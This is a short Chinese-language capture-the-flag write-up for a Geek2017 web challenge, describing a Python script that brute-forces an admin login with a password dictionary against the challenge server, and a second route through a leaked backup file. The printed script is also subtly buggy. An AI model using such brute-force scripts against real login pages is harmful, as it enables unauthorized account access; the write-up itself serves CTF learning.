怎么又是web?　　EXM?? 我一定是个假的二进制手

假装来看看吧

以Geek2017 粗心的李超为例（大佬们，我知道错了，第一次搞忘了规矩了）

The first way：弱口令爆破   

 

网页里只有两个输入框，从源码里能找到name

生成字典，去Python里request爆破吧，脚本如下

1 # coding:utf-8 2 import requests 3 import time 4 url='http://game.sycsec.com:2001' 5 f = open("dic.txt","r",encoding="utf-8") 6 # print(len(f.readlines())) 7 for i in range(f.readlines()): 8     psd = f.readline().replace("\n","") 9     p = {
   'user': 'admin', 'pass': psd}10     print(p)11     r = requests.post(url, data=p)12     # time.sleep(1)13     print(i)14     if 'SYC' in r.text:15         print(r.text)16         break

注意要把字典中的\n去掉

另外在爆破过程中可能会蜜汁服务器拒绝响应，从上次断开的点重新开始吧

最后经过撕心裂肺的尝试终于get啦

 

 The second way：备份文件泄露

 

 直接能下载备份文件啦，果然是粗心的李超呢

 

无限春光，尽收眼底

输进去就好啦

另外某大佬说用burpsuite，emmm等我学会了再来填坑吧

 

作者：

出处：

如有转载，荣幸之至！请随手标明出处；